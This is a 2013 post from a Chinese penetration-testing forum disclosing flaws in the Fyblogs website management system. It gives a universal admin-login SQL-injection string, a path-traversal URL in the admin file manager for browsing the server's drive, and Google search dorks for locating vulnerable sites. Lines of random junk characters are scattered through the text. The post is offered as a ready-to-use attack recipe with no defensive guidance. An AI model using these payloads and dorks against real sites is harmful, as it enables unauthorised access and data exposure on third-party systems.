中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:17
标题:
Fyblogs网站管理系统漏洞
后台万能密码 'or'='or'
- n* c# x/ R, d) l! r/ R* Q
* z! d. F' H0 L- C
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
$ b7 k9 r4 ~9 k7 o
admin/uploadfile.asp?currentFolder=/upfiles/../
$ O" Z" x3 d* E' q/ {9 k3 h
2 S# }$ e0 N7 G, a" S
漏洞证明:
7 u, a# U* T3 C$ P7 L. ~2 b8 c& d
8 Y6 H8 \' q$ N) }4 f2 f; [
谷歌:inurl:type.asp?id=1 新闻中心
7 U$ i& V6 ?4 ?3 T5 j
或者 :inurl:download_ok.asp?
6 y" S( r d& G$ N
7 ~5 J4 [: H# u7 _, ?: k6 [" j
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2